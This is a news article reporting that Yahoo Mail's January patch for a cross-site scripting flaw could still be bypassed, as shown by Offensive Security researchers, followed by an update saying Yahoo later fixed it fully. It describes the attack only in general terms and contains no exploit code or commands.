Yahoo Mail XSS Vulnerability Still Exploitable After Patch

The patch that didn’t patch up much

Yahoo Mail is still affected by an XSS vulnerability, despite the troubled Internet giant shoving out what it believed was a fix earlier this month.

On 7 January, Yahoo issued a fix for the flaw, which allowed a hacker to take complete control of a victim’s machine by carrying out a cross-site scripting (XSS) attack. But researchers subsequently found a way to exploit the flaw, even after the patch.

XSS flaws work where a website allows untrusted data to be rendered on a page. If that data includes JavaScript code, then it can potentially access user cookies.

Yahoo Mail insecurity

To compromise user accounts, attackers have to get their targets to click on a link, which then forces them to execute JavaScript code into the part of the website where the flaw resides. This code accesses the cookies and passes them over to the attacker’s own server.

The vulnerability has come as a setback for Yahoo, which had only launched its revamped Mail client in mid-December.

“With little modification to the original proof of concept code written by Abysssec, it is still possible to exploit the original Yahoo vulnerability, allowing an attacker to completely take over a victim’s account,” wrote researchers on the Offensive Security blog.

“The victim has to be lured to click a link which contains malicious XSS code for the attack to succeed.

“Yahoo Mail users should be on guard against clicking any links for the foreseeable future. Due to the nature of the vulnerability, XSS filters and similar protections provide little defense against this attack.”

The team showed how the XSS vulnerability could be exploited in this video below:

Microsoft saw one of its fixes smashed wide open by researchers this month, when Exodus Intelligence showed how it could still exploit a flaw in Internet Explorer, meaning users were open to attack.

UPDATE: Yahoo got in touch to say it has now fixed the flaw properly: “The cross-site scripting vulnerability that we identified on Friday was fixed the same day. We can confirm that we’ve now fixed the vulnerability on all versions of the site.”

What do you know about online security? Try our quiz and find out!